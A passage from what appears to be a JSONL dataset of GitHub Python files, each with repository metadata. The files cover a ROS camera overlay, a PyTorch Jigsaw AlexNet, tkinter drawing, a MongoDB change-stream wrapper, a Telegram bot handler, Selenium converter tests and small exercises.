sys\nimport rospy\nimport cv2\nfrom std_msgs.msg import String\nfrom sensor_msgs.msg import Image, Joy\nfrom cv_bridge import CvBridge, CvBridgeError\nimport time\n\n\nclass image_converter:\n\n def __init__(self):\n self.image_pub = rospy.Publisher(\"image_overlay\",Image)\n\n self.bridge = CvBridge()\n self.image_sub = rospy.Subscriber(\"/stereo/left/image_raw\",Image,self.callback)\n self.twistJoystickForce = None\n self.twistJoystickTorque = None\n trans_sub = rospy.subscribe(\"/translate/joy\", Joy, self.translateCb);\n rot_sub = rospy.subscribe(\"/rotate/joy\", Joy, self.rotateCb);\n\n\n def translateCb(self,msg):\n twistMsg.force.x = msg.axes[1] * 20\n twistMsg.force.y = msg.axes[0] * 20\n twistMsg.force.z = msg.axes[2] * 20\n twistJoystickForce = [twistMsg.force.x,twistMsg.y,twistMsg.z] \n\n def rotateCb(self, msg):\n twistMsg.torque.x = msg.axes[0] * -2\n twistMsg.torque.y = msg.axes[1] * 2\n twistMsg.torque.z = msg.axes[2] * 2\n twistJoystickTorque = [twistMsg.torque.x,twistMsg.torque.y,twistMsg.torque.z]\n\n def callback(self,data):\n try:\n cv_image = self.bridge.imgmsg_to_cv2(data, \"bgr8\")\n except CvBridgeError as e:\n print(e)\n\n font = cv2.FONT_HERSHEY_SIMPLEX\n text = str(time.time())\n \n pts = np.array([[50,430],[50,380],[100,430],[100,380]], np.int32)\n pts = pts.reshape((-1,1,2))\n cv2.polylines(img, [pts], True, (0,255,255))\n cv2.line(img, [75,405], [twistJoystickForce.x, TwistJoystickForce.y], (255,255,255))\n\n pts = np.array([[590,430],[590,380],[540,430],[540,380]], np.int32)\n pts = pts.reshape((-1,1,2))\n cv2.polylines(img, [pts], True, (0,255,255))\n cv2.line(img, [565,405], [twistJoystickTorque.x, twistJoystickTorque.y], (255,255,255))\n\n cv2.putText(img,text,(10,100), font, 4,(255,255,255),2,cv2.LINE_AA)\n\n filename = text + \".png\"\n cv2.imwrite(filename,img)\n\n try:\n self.image_pub.publish(self.bridge.cv2_to_imgmsg(cv_image, \"bgr8\"))\n except CvBridgeError as e:\n print(e)\n \ndef main(args):\n ic = image_converter()\n rospy.init_node('image_converter', anonymous=True)\n try:\n rospy.spin()\n\n except KeyboardInterrupt:\n print(\"Shutting down\")\n cv2.destroyAllWindows()\n\n\n\nif __name__ == '__main__':\n main(sys.argv)\n","repo_name":"RoboticsClubatUCF/RoboSub","sub_path":"ucf_sub_catkin_ros/src/sub_utils/src/sub_image_overlay.py","file_name":"sub_image_overlay.py","file_ext":"py","file_size_in_byte":2301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"71265917929","text":"import torch.nn as nn\nimport torch\nfrom torchvision.models import alexnet as alex, AlexNet\n\n\nclass AlexNet(nn.Module):\n \"\"\"\n Custom AlexNet like Unsupervised learning paper\n \"\"\"\n\n def __init__(self, input_channels: int=1, n_output_payer=100):\n super(AlexNet, self).__init__()\n self.num_tiles = 9\n # Alext net input dim 256×256x3\n self.features = nn.Sequential(\n nn.Conv2d(input_channels, 96, kernel_size=11, stride=2, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(96, 256, kernel_size=5, padding=2),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Conv2d(256, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 384, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.Conv2d(384, 256, kernel_size=3, padding=1),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=3, stride=2),\n nn.Flatten()\n )\n\n # intermediate feature representation F\n self.flatten_feats = nn.Sequential(\n nn.Linear(1024, 512),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Flatten(0), # concat simulation (9, 512) -> (1, 4608)\n )\n\n # Concatenated nineth networks\n self.clasif_concatenated = nn.Sequential(\n nn.Linear(512 * 9, 4096),\n nn.ReLU(inplace=True),\n nn.Dropout(),\n nn.Linear(4096, n_output_payer))\n\n\nclass JigsawNetAlex(AlexNet):\n \"\"\"\n Unsupervised learning solving Jigsaw puzzle\n Paper implementation using Alexnet\n \"\"\"\n\n def __init__(self, num_tiles):\n \"\"\"\n\n Args:\n num_tiles:\n num_perm:\n \"\"\"\n super().__init__()\n self.tiles = num_tiles\n\n\n def forward(self, x):\n \"\"\"\n\n Args:\n x: Tiles of dim tensor (B, tiles, C, W, H)\n\n Returns:\n float number of index permutation shape (B, 100)\n \"\"\"\n con = []\n for batch in range(0, x.shape[0]):\n\n # get (9, 1024)\n tile = self.features(x[batch, :, :, :, :])\n\n # return (9, 512)\n con.append(self.flatten_feats(tile))\n\n y = torch.vstack(con)\n y = self.clasif_concatenated(y)\n return y\n\n\ndef jigsawnet_alexnet(tiles=9, pretrained=False) -> torch.nn.Module:\n if pretrained:\n print(\"Not Implemented\")\n return None\n else:\n return JigsawNetAlex(num_tiles=tiles)\n","repo_name":"Karimx/unsuperviced_learning_Jigsaw","sub_path":"jigsawnet.py","file_name":"jigsawnet.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34422962986","text":"from tkinter import Tk, Label, Canvas, Button, PhotoImage\n\ntela = Tk()\n\ntela.geometry(\"900x500\")\ntela.title(\"Desenho no Canvas\")\n\ntitulo = Label(tela, text=\"Desenho com python\", font=\"Arial 32\", fg=\"#333333\")\ncanvas = Canvas(tela, bg=\"#888888\")\n\ndef mover():\n canvas.move(retangulo, 5, 5) # relativo para baixo\n #canvas.moveto(circulo, 60, 100) # absoluto\n print(\"Movendo...\")\n\ndef aumentar():\n canvas.coords(retangulo, 10, 10, 100, 200)\n print(\"Aumentando...\")\n\ndef diminuir():\n canvas.coords(retangulo, 10, 10, 100, 100)\n print(\"Diminuindo...\")\n\nimg = PhotoImage(file=\"imagens/PUC.png\")\nlogoPUC = canvas.create_image(120, 120, image=img)\ncirculo = canvas.create_oval(60, 60, 150, 150, fill=\"red\")\nretangulo = canvas.create_rectangle(10, 10, 100, 100, outline=\"black\", fill=\"blue\")\nbotao = Button(tela, text=\"Mover\", font=\"Arial 22\", bg=\"#999999\", fg=\"#000000\", command=mover)\nbotao2 = Button(tela, text=\"Aumentar\", font=\"Arial 22\", bg=\"#999999\", fg=\"#000000\", command=aumentar)\nbotao3 = Button(tela, text=\"Diminuir\", font=\"Arial 22\", bg=\"#999999\", fg=\"#000000\", command=diminuir)\n\ntitulo.pack()\ncanvas.pack()\nbotao.pack()\nbotao2.pack()\nbotao3.pack()\n\ntela.mainloop()","repo_name":"ubiratantavares/puc_minas_iot_industrial_programacao_para_desenvolvimento_iiot","sub_path":"aula3/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1189,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14583551179","text":"\"\"\"\nwatch.py\n\nManages the watch cursor.\n\"\"\"\n\n\nimport time\nimport typing\n\nimport pymongo.change_stream\nimport pymongo.collection\nimport pymongo.database\nimport pymongo.mongo_client\n\nOperationType = typing.Literal[\"insert\", \"update\", \"delete\", \"replace\", \"drop\", \"rename\", \"dropDatabase\", \"invalidate\"]\n\n\nclass Operation():\n \"\"\"\n An enum for the different event that can occur on MongoDB\n\n Example\n -------\n >>> from yuno.direction import Operation\n >>> Operation.INSERT\n 'insert'\n \"\"\"\n UPDATE: OperationType = \"update\"\n INSERT: OperationType = \"insert\"\n DELETE: OperationType = \"delete\"\n REPLACE: OperationType = \"replace\"\n DROP: OperationType = \"drop\"\n RENAME: OperationType = \"rename\"\n DROP_DATABASE: OperationType = \"dropDatabase\"\n INVALIDATE: OperationType = \"invalidate\"\n\n\nclass WatchEvent():\n \"\"\"\n An object representing an event on MongoDB.\n \"\"\"\n class Namespace:\n \"\"\"\n The namespace the event occured in\n \"\"\"\n\n def __init__(self, data: dict) -> None:\n self.database = data.get(\"db\")\n self.collection = data.get(\"coll\")\n\n def __getitem__(self, key: str) -> str:\n return self.__getattribute__(key)\n\n class LSID:\n \"\"\"\n The id of the event\n \"\"\"\n\n def __init__(self, data: dict) -> None:\n self.id = data.get(\"id\", None)\n self.uid = data.get(\"uid\", None)\n\n def __init__(self, data: dict) -> None:\n \"\"\"Initialize the object with raw event data\"\"\"\n self.id = self._id = data.get(\"_id\")\n self.operation: OperationType = data.get(\"operationType\")\n self.document = data.get(\"fullDocument\", None)\n self.namespace = self.Namespace(data.get(\"ns\", {}))\n self.timestamp = data.get(\"clusterTime\", None)\n self.transaction = data.get(\"txnNumber\", None)\n self.session_id = self.LSID(data.get(\"lsid\", {}))\n\n\nclass CRUDEvent(WatchEvent):\n class DocumentKey:\n def __init__(self, data: dict) -> None:\n self.id = self._id = data.get(\"_id\")\n self.__data__ = dict(data)\n\n def __getattribute__(self, name: str):\n if name in (\"__data__\", \"__getitem__\", \"__getattribute__\"):\n return super().__getattribute__(name)\n return self.__getitem__(name)\n\n def __getitem__(self, name: str):\n return self.data[name]\n\n def __init__(self, data: dict) -> None:\n super().__init__(data)\n self.document_key = self.DocumentKey(data.get(\"documentKey\", {})) # insert, replace, delete, update\n\n\nclass UpdateEvent(CRUDEvent):\n class Description:\n class Truncated:\n def __init__(self, data: dict) -> None:\n self.field = data.get(\"field\", None)\n self.new_size = data.get(\"newSize\", None)\n\n def __init__(self, data: dict) -> None:\n self.updated_fields: typing.Dict[str, typing.Any] = data.get(\"updatedFields\", {})\n self.removed_fields: typing.List[str] = data.get(\"removedFields\", [])\n self.truncated_arrays = [self.Truncated(e) for e in data.get(\"truncatedArrays\", [])]\n\n def __init__(self, data: dict) -> None:\n super().__init__(data)\n self.update_description = self.Description(data.get(\"updateDescription\", {}))\n\n\nclass InsertEvent(CRUDEvent):\n pass\n\n\nclass DeleteEvent(CRUDEvent):\n pass\n\n\nclass ReplaceEvent(CRUDEvent):\n pass\n\n\nclass DropEvent(WatchEvent):\n pass\n\n\nclass RenameEvent(WatchEvent):\n def __init__(self, data: dict) -> None:\n super().__init__(data)\n self.to = self.Namespace(data.get(\"to\", {})) # rename\n\n\nclass DropDatabaseEvent(WatchEvent):\n pass\n\n\nclass InvalidateEvent(WatchEvent):\n pass\n\n\nclass Watch():\n \"\"\"\n A db.watch(), db.collection.watch(), db.collection.object.watch() stream to get the different events.\n \"\"\"\n __stream__: pymongo.change_stream.ChangeStream\n __watching_object__: pymongo.collection.Collection\n __state__: dict = {\n \"token\": None, # the resume token\n \"time\": 0, # time of the last error\n \"count\": 0 # number of errors in the period\n }\n\n # pipeline=pipeline, full_document=None, resume_after=resume_state[\"token\"], max_await_time_ms=None,\n # batch_size=None, collation=None, start_at_operation_time=None, session=None, start_after=None\n\n def __init__(self, watching_object: typing.Union[pymongo.collection.Collection, pymongo.database.Database, pymongo.mongo_client.MongoClient], pipeline: typing.List[dict] = None, full_document: typing.Union[str, bool] = False, error_limit: int = 3, error_expiration: float = 60, **kwargs) -> None:\n \"\"\"\n Initializes the stream.\n\n Parameters\n ----------\n watching_object: pymongo.collection.Collection, pymongo.database.Database, pymongo.mongo_client.MongoClient\n The object to watch.\n pipeline: list[dict]\n The pipeline to use.\n full_document: bool, str\n To return the full document when the event is an UpdateEvent.\n error_limit: int\n The number of errors before the stream is closed.\n error_expiration: float\n The number of seconds before the error count is reset.\n kwargs:\n The arguments to pass to the stream.\n \"\"\"\n if isinstance(full_document, bool):\n full_document = \"updateLookup\" if full_document else None\n self.pipeline = pipeline\n self.full_document = full_document\n self.kwargs = kwargs\n\n self.error_limit = int(error_limit)\n self.error_expiration = float(error_expiration)\n\n self.__watching_object__ = watching_object\n self.__stream__ = watching_object.watch(pipeline, full_document, **kwargs)\n self.__closed__ = False\n\n def __next__(self): # alias\n \"\"\"\n Get the next event (blocking operation)\n\n Returns\n -------\n WatchEvent\n The next event to occur on the object.\n\n Example\n -------\n >>> document = db.collection.document\n >>> watch_obj = document.watch()\n >>> for event in watch_obj:\n >>> print(event) # only called when an event occurs on the database\n \"\"\"\n return self.next()\n\n def _get_right_event(self, data: dict) -> WatchEvent:\n \"\"\"\n An internal function to get the right event type from raw event data.\n\n Parameters\n ----------\n data: dict\n The raw event data.\n\n Returns\n -------\n WatchEvent\n The event.\n \"\"\"\n operation = data.get(\"operationType\", None)\n if operation == Operation.UPDATE:\n return UpdateEvent(data)\n elif operation == Operation.INSERT:\n return InsertEvent(data)\n elif operation == Operation.DELETE:\n return DeleteEvent(data)\n elif operation == Operation.REPLACE:\n return ReplaceEvent(data)\n elif operation == Operation.DROP:\n return DropEvent(data)\n elif operation == Operation.RENAME:\n return RenameEvent(data)\n elif operation == Operation.DROP_DATABASE:\n return DropDatabaseEvent(data)\n elif operation == Operation.INVALIDATE:\n return InvalidateEvent(data)\n return WatchEvent(data)\n\n def next(self) -> WatchEvent:\n \"\"\"\n Get the next event (blocking operation)\n\n Returns\n -------\n WatchEvent\n The next event to occur on the object.\n\n Example\n -------\n >>> document = db.collection.document\n >>> watch_obj = document.watch()\n >>> for event in watch_obj:\n >>> print(event) # only called when an event occurs on the database\n \"\"\"\n if self.__closed__:\n raise StopIteration(\"Stream is closed\")\n try:\n data = self.__stream__.next()\n self.__state__[\"token\"] = self.resume_token\n except Exception as err:\n self.__state__[\"count\"] += 1\n if time.time() - self.__state__[\"time\"] > self.error_expiration:\n self.__state__[\"time\"] = time.time()\n self.__state__[\"count\"] = 1\n else:\n self.__state__[\"time\"] = time.time()\n if self.__state__[\"count\"] >= self.error_limit:\n try:\n self.__stream__.close()\n except Exception:\n pass\n raise ValueError(\"More than {} errors have occured in {} seconds while watching for changes in {}\".format(\n self.error_limit, self.error_expiration, self.__watching_object__)) from err\n self.kwargs[\"resume_after\"] = self.__state__[\"token\"]\n self.__stream__ = self.__watching_object__.watch(self.pipeline, self.full_document, **self.kwargs)\n return self.__next__()\n\n return self._get_right_event(data)\n\n def try_next(self) -> typing.Any:\n \"\"\"\n Try to get the next event without raising an exception and without waiting.\n\n Returns\n -------\n WatchEvent\n \"\"\"\n try:\n data = self.__stream__.try_next()\n if data is not None:\n return self._get_right_event(data)\n return data\n except StopIteration:\n return None\n\n def close(self):\n \"\"\"Closes the stream.\"\"\"\n self.__closed__ = True\n self.__stream__.close()\n\n def resume(self):\n \"\"\"Resume the stream from the last known state.\"\"\"\n self.kwargs[\"resume_after\"] = self.__state__[\"token\"]\n self.__stream__ = self.__watching_object__.watch(self.pipeline, self.full_document, **self.kwargs)\n self.__closed__ = False\n\n @property\n def resume_token(self):\n \"\"\"Get the resume token, which is used to resume the stream if failed.\"\"\"\n return self.__stream__.resume_token\n\n @property\n def alive(self):\n \"\"\"\n Get whether the stream is alive.\n\n Returns\n -------\n bool\n Whether the stream is alive.\n \"\"\"\n return self._cursor.alive\n\n def __enter__(self):\n \"\"\"\n Enter the context manager.\n\n Example\n -------\n >>> with db.watch() as stream: # <-- this line calls __enter__\n ... for event in stream:\n ... print(event)\n \"\"\"\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n \"\"\"\n Exit the context manager.\n\n Example\n -------\n >>> with db.watch() as stream:\n ... for event in stream:\n ... print(event)\n ... # <-- this line calls __exit__\n \"\"\"\n self.close()\n\n def __iter__(self) -> typing.Iterator[WatchEvent]:\n \"\"\"\n Returns the iterator.\n \"\"\"\n return self\n","repo_name":"Animenosekai/yuno","sub_path":"yuno/watch.py","file_name":"watch.py","file_ext":"py","file_size_in_byte":10963,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"30836410133","text":"from typing import TYPE_CHECKING\n\nfrom aiogram import Router, types, F\nfrom fluentogram import TranslatorRunner\n\nfrom src.application.admin.interfaces.uow import IAdminUoW\nfrom src.application.admin.usecases.admin import GetAdmin\nfrom src.bot.constants import MISS\nfrom src.bot.keyboards.root.admins.callback_data import (\n AdminCallbackData,\n AdminAction,\n)\nfrom src.bot.keyboards.root.admins.info import get_admin_info_markup\n\nif TYPE_CHECKING:\n from src.infrastructure.localization.translator import TranslatorRunner\n\nrouter = Router()\n\n\n@router.callback_query(AdminCallbackData.filter(F.action == AdminAction.INFO))\nasync def on_admin_info(\n c: types.CallbackQuery,\n callback_data: AdminCallbackData,\n base_url: str,\n ftl: TranslatorRunner,\n uow: IAdminUoW,\n):\n admin = await GetAdmin(uow)(callback_data.admin_id)\n text = ftl.root.profile.registry.admin.info(\n surname=admin.surname,\n name=admin.name,\n patronymic=admin.patronymic or MISS,\n phone=f\"+{admin.user.phone}\" if admin.user.phone else MISS,\n email=admin.user.email,\n telegram_id=str(admin.user.telegram_id) if admin.user.telegram_id else MISS,\n username=admin.user.telegram_username or MISS,\n birthday=admin.birthday,\n level=admin.level or MISS,\n description=admin.description or MISS,\n access_start=admin.access_start,\n access_end=admin.access_end,\n timezone=admin.user.timezone,\n )\n markup = get_admin_info_markup(ftl, callback_data.admin_id, base_url)\n await c.message.edit_text(text, reply_markup=markup)\n await c.answer()\n","repo_name":"shalmeo/xingfu","sub_path":"src/bot/handlers/root/admins/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":1624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"43446874584","text":"import random\nfrom subject_misc import programme_max_quota, prioritization\nfrom oleveldata import StudentOlevelRecord\n\nclass OfferedProgramme(StudentOlevelRecord):\n '''This class look up appropriate programme for qualifying candidate\n it either recommeded the original programme or alternative\n '''\n def __init__(self,*args):\n ''' admi_status Boolean, student_ranking position, carrying capacity of\n the programmme\n '''\n super().__init__(args[0])\n self.adm_status = args[1]\n self.student_ranking = args[2]\n self.programme_quota = args[3]\n self.return_offered_programme()\n \n def getalterProgramme(self, *args):\n # This function use priority key to get the list of all alternative programme\n available_programme = []\n priorityKey = None\n for key, value in args[0].items():\n if key.lower() != self.Programme.lower():continue\n else:\n priorityKey = value\n \n for key, value in args[0].items():\n if value >= priorityKey:continue\n else:\n available_programme.append(key)\n return available_programme\n\n\n\n def getStatus(self, *args):\n if args[0] == True and args[1] <= args[2]:\n return True\n else:\n return False\n\n def return_offered_programme(self):\n # Return Recommeded alternative programme\n status = self.getStatus(self.adm_status, self.student_ranking, self.programme_quota)\n if status:\n return self.Programme\n else:\n list_prog = self.getalterProgramme(prioritization)\n recom_programme = self.getrandomElement(list_prog)\n return recom_programme\n \n\n def getrandomElement(self, elements):\n # Generate random alternative programme, need to modify to recommeded programe base on rules\n max_lenght = len(elements)\n randomize = random.randint(0, max_lenght)\n if randomize == max_lenght:\n randomize = randomize - 1\n return elements[randomize]\n else:\n return elements[randomize]\n \n","repo_name":"blueband/nigerian_university_admission_data","sub_path":"selection_criteria.py","file_name":"selection_criteria.py","file_ext":"py","file_size_in_byte":2165,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5698524224","text":"import sys\nimport json # json é um modulo que vem embutido, porém precisamos importá-lo\nimport csv\n\n\ndef imprimir_nome_na_vertical():\n nome = input(\"Qual o seu nome? \")\n\n for letra in nome:\n print(letra)\n\n\ndef somar_numeros():\n numeros_input = input(\n \"Digite os números a serem somados, separando-os por espaços: \"\n )\n\n numeros = numeros_input.split()\n soma = 0\n\n for numero in numeros:\n if not numero.isdigit():\n return print(\n f\"Erro ao somar valores, {numero} é um valor inválido\",\n file=sys.stderr,\n )\n\n soma += int(numero)\n\n print(soma)\n\n\ndef impressoes_desempacotadas():\n a, b = \"cd\"\n print(a) # saída: c\n print(b) # saída: d\n\n # Quando um * está presente no desempacotamento, os valores são\n # desempacotados em formato de lista.\n head, *tail = (\n 1,\n 2,\n 3,\n )\n print(head) # saída: 1\n print(tail) # saída: [2, 3]\n\n\ndef tente_entrar_com_um_numero():\n while True:\n try:\n int(input(\"Please enter a number: \"))\n break\n except ValueError:\n print(\"Oops! That was no valid number. Try again...\")\n\n\ndef listar_reprovados():\n with open(\"notas.txt\", \"r\") as notas:\n for line in notas:\n nome, nota = line.split()\n if int(nota) < 6:\n with open(\"reprovados.txt\", \"a\") as reprovados:\n print(nome, file=reprovados)\n\n with open(\"reprovados.txt\", \"r\") as reprovados:\n for line in reprovados:\n print(line)\n\n\ndef manipular_json_com_pokemon():\n with open(\"pokemons.json\") as file:\n # content = file.read() # leitura do arquivo\n # # o conteúdo é transformado em estrutura python equivalente,\n # # dicionário neste caso. acessamos a chave results que é onde contém\n # # nossa lista de pokemons\n # pokemons = json.loads(content)[\"results\"]\n pokemons = json.load(file)[\"results\"]\n\n # Leitura de todos os pokemons\n with open(\"pokemons.json\") as file:\n pokemons = json.load(file)[\"results\"]\n\n # print(pokemons[0]) # imprime o primeiro pokemon da lista\n\n # Separamos somente os do tipo grama\n grass_type_pokemons = [\n pokemon for pokemon in pokemons if \"Grass\" in pokemon[\"type\"]\n ]\n\n # Abre o arquivo para escrevermos apenas o pokemons do tipo grama\n with open(\"grass_pokemons.json\", \"w\") as file:\n # json_to_write = json.dumps(\n # grass_type_pokemons\n # ) # conversão de Python para o formato json (str)\n # file.write(json_to_write)\n # escreve no arquivo já transformando em formato json a estrutura\n json.dump(grass_type_pokemons, file)\n\n\n# lê os dados\nwith open(\"graduacao_unb.csv\", encoding=\"utf-8\") as file:\n # graduacao_reader = csv.reader(file, delimiter=\",\", quotechar='\"')\n # # Usando o conceito de desempacotamento\n # header, *data = graduacao_reader\n graduacao_reader = csv.DictReader(file, delimiter=\",\", quotechar='\"')\n\n # print(data)\n\n # a linha de cabeçalhos é utilizada como chave do dicionário\n # agrupa cursos por departamento\n group_by_department = {}\n # for row in data:\n for row in graduacao_reader:\n # department = row[15]\n department = row[\"unidade_responsavel\"]\n if department not in group_by_department:\n group_by_department[department] = 0\n group_by_department[department] += 1\n\n # Escreve o relatório em .csv\n # Abre um arquivo para escrita\nwith open(\"department_report.csv\", \"w\", encoding=\"utf-8\") as file:\n # writer = csv.writer(file)\n\n # Escreve o cabeçalho\n # os valores a serem escritos devem ser dicionários\n headers = [\n \"Departamento\",\n \"Total de Cursos\",\n ]\n # writer.writerow(headers)\n # É necessário passar o arquivo e o cabeçalho\n writer = csv.DictWriter(file, fieldnames=headers)\n writer.writeheader()\n\n # Escreve as linhas de dados\n # Desempacotamento de valores\n for department, grades in group_by_department.items():\n # Agrupa o dado com o turno\n # row = [\n # department,\n # grades,\n # ]\n row = {\"Departamento\": department, \"Total de Cursos\": grades}\n writer.writerow(row)\n","repo_name":"alvesgf16/trybe-exercicios","sub_path":"ciencia-da-computacao/bloco-33-introducao-a-python/dia-02-entrada-e-saida-de-dados/comprehension_exercises.py","file_name":"comprehension_exercises.py","file_ext":"py","file_size_in_byte":4340,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74797444646","text":"#!/usr/bin/env python3\n\n# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n\n def dfs(self, root : TreeNode, path : int, digit : str) -> None:\n digit += str(root.val)\n if not root.left and not root.right:\n self.ans += int(digit)\n return\n if root.left:\n self.dfs(root.left, path, digit + \"\")\n if root.right:\n self.dfs(root.right, path, digit + \"\")\n\n def sumNumbers(self, root: TreeNode) -> int:\n self.ans = 0\n self.dfs(root,0 ,\"\")\n\n return self.ans","repo_name":"femifacia/algorithms","sub_path":"python/algorithms/sum_root_to_leaf_numbers/main_dfs_recursive_with_string.py","file_name":"main_dfs_recursive_with_string.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"38211938272","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as ec\nfrom selenium.common.exceptions import TimeoutException\nimport pytest\nimport allure\nfrom selenium.common.exceptions import NoSuchElementException\n\n\nclass StartEnd:\n # открыть браузер, загрузить страницу\n def setup_class(self):\n self.driver = webdriver.Chrome()\n self.driver.implicitly_wait(15)\n self.driver.maximize_window()\n self.driver.get('http://www.sberbank.ru/ru/quotes/converter')\n with pytest.allure.step('Загрузка страницы'):\n assert 'Калькулятор иностранных валют' in self.driver.title, 'Страница не загрузилась'\n\n # закрыть браузер\n def teardown_class(self):\n self.driver.quit()\n\n\nclass Driver:\n def __init__(self, driver):\n self.driver = driver\n\n\nclass Converter(Driver):\n summ = \"//input[@placeholder='Сумма']\"\n convFrom = \"//select[@name='converterFrom']/..\"\n convTo = \"//select[@name='converterTo']/..\"\n cash = \"//div[contains(concat(@class,' '),'kit-radio__text') and text()='Наличные']\"\n choose_cash = \"//div[contains(concat(@class,' '),'kit-radio__text') and text()='Выдать наличные']\"\n show_button = \"//button[@class='rates-button' and text()='Показать']\"\n result_to = \"//span[@class='rates-converter-result__total-to']\"\n convFrom_select = \"//select[@name='converterFrom']/..//strong\"\n convTo_select = \"//select[@name='converterTo']/..//strong\" # найти элемент по xpath\n\n def find(self, xpath):\n try:\n self.driver.find_element_by_xpath(xpath)\n except NoSuchElementException:\n return \"Invalid xpath!\"\n return self.driver.find_element_by_xpath(xpath)\n\n def get_text(self, xpath):\n return self.driver.find_element_by_xpath(xpath).text\n\n # ввод суммы и конвертация\n @pytest.fixture()\n @pytest.allure.step('Ввод суммы и конвертация')\n def converter_func(self, input, output):\n\n with pytest.allure.step('Ввод новых данных в поле \"Сумма\"'):\n # находим и кликаем поле для ввода суммы\n summa = self.find(Converter.summ)\n summa.click()\n assert 'Не удалось выделить поле для ввода суммы'\n\n # очищаем поле для ввода суммы\n summa.clear()\n summa.clear()\n summa.clear()\n assert 'Не удалось очистить поле для ввода суммы'\n\n # вводим данные\n summa.send_keys(input)\n assert 'Не удалось ввести данные'\n\n with pytest.allure.step('Вывод результата'):\n # кликаем по кнопке \"Показать\"\n button = self.find(self.show_button)\n button.click()\n assert 'Не удалось нажать кнопку \"Показать\"'\n # ждем, когда значение в блоке с результатом обновится (совпадения знаков до запятой)\n try:\n WebDriverWait(self.driver, 10).until(ec.text_to_be_present_in_element((By.XPATH, self.result_to), output[:-3]))\n text = self.find(self.result_to).text[:-4] # заменяем запятую на точку для сравнения результата\n text = text[:-3] + '.' + text[-2:]\n return text\n\n except TimeoutException:\n raise Exception('Значение не получено')\n\n # проверить список валют \"из\"\n @pytest.allure.step('Проверяет список валют - \"из\"')\n def from_currency_func(self, data):\n xpath2 = \"//select[@name='converterFrom']/..//span[contains(text(),\" + \" '\" + data + \"'\" + \")]\"\n\n # находим и кликаем список валюты\n currency = self.find(self.convFrom)\n currency.click()\n\n with pytest.allure.step('Выбор валюты из списка'):\n # находим валюту в списке и выбираем ее\n currency_item = self.find(xpath2)\n currency_item.click()\n return currency.text\n\n # Проверить список валют \"в\"\n @pytest.allure.step('Проверяет список валют - \"в\"')\n def to_currency_func(self, data):\n xpath2 = \"//select[@name='converterTo']/..//span[contains(text(),\" + \" '\" + data + \"'\" + \")]\"\n\n # находим и кликаем список валюты\n converterTo = self.find(self.convTo)\n converterTo.click()\n\n with pytest.allure.step('Выбор валюты из списка'):\n # находим валюту в списке и выбираем ее\n currency_item = self.find(xpath2)\n currency_item.click()\n return converterTo.text\n","repo_name":"Mardonov/conv-calc","sub_path":"utils/steps.py","file_name":"steps.py","file_ext":"py","file_size_in_byte":5282,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"9090778307","text":"class Solution(object):\n def twoSum(self, nums, target):\n \"\"\"\n :type nums: List[int]\n :type target: int\n :rtype: List[int]\n \"\"\"\n s = set()\n ret = [None, None]\n for i, n in enumerate(nums):\n if n in s:\n ret[1] = i\n ret[0] = nums.index(target - n)\n break\n s.add(target - n)\n \n return ret","repo_name":"casprwang/leetcode","sub_path":"solutions/001.two-sum/two-sum.py","file_name":"two-sum.py","file_ext":"py","file_size_in_byte":429,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"4262220308","text":"import decimal\nimport numconv\nimport werkzeug.exceptions\n\nfrom . import inspect as ppi\nfrom .debug import pp_t\n\nURI_FOR_GENERAL_TASKS = 'pub'\nURI_FOR_NONE = 'index'\nURI_FOR_ERROR = 'error'\nURI_FOR_STATIC_FILES = 'static'\n\nMARKER_MODULUS = 1000\n\nclass Id(int):\n \"\"\"Represents a biv_id\"\"\"\n def __new__(cls, biv_id_or_marker, biv_index=None):\n \"\"\"Pass in an int, str, or existing biv_id\"\"\"\n if isinstance(biv_id_or_marker, cls):\n return biv_id_or_marker\n if isinstance(biv_id_or_marker, Marker):\n assert isinstance(biv_index, Index), repr(biv_index) \\\n + ': not Index'\n bi = biv_index * MARKER_MODULUS + biv_id_or_marker\n self = super().__new__(cls, bi)\n self.__marker = biv_id_or_marker\n self.__index = biv_index\n else:\n bi = int(biv_id_or_marker)\n assert MARKER_MODULUS < bi <= _MAX_ID, str(bi) + ': range'\n self = super().__new__(cls, bi)\n self.__marker = Marker(bi % MARKER_MODULUS)\n self.__index = Index(bi // MARKER_MODULUS)\n return self\n\n @property\n def biv_marker(self):\n \"\"\"Marker object for this Id\"\"\"\n return self.__marker\n\n @property\n def biv_index(self):\n \"\"\"Index object for this Id\"\"\"\n return self.__index\n\n def to_biv_uri(self, use_alias=True):\n \"\"\"Converts a biv_id to a biv_uri.\n\n :param use_alias: If False, creates encoded uri, always\n \"\"\"\n if use_alias:\n i = self.__int__()\n if i in _id_to_alias:\n return 